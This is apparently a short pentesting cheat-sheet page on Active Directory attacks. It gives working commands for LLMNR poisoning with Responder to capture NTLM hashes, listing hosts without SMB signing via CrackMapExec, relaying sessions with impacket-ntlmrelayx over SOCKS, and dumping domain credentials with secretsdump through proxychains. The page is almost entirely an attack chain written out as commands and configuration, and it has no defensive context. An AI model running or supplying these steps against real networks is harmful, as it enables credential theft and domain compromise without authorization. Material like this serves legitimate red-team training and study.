🖥️AD Attacks
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
We can grab some hashed credentials if LLMNR protocol is enabled.
sudo responder -I eth0 -Fw
After some time we can get all the hashes.
cd /usr/share/responder
sudo python DumpHash.py
Some tiems some server are misconfigured and have the smb signing disabled, so we can perform more attacks with responder.
/etc/proxychains4.conf
socks4 127.0.0.1 1080
/usr/share/responder/Responder.conf
[Responder Core]
; Servers to start
SMB = Off
HTTP = On
We need to get a list of the servers with the SMB sigining disabled.
crackmapexec smb --gen-relay-list vulnerable_servers.txt 10.10.10.0/24
Execute the attack with Responder and Impacket.
impacket-ntlmrelayx.py -tf ./vulnerable_servers.txt -socks -smb2support
sudo responder -I eth0
We can list the current sessions with the next command.
ntlmrelayx> socks
When a session with administrative privileges is found we can use secretsdump or other tool with proxychains to use the session captured.
proxychains impacket-secretdump DOMAIN/admin@IP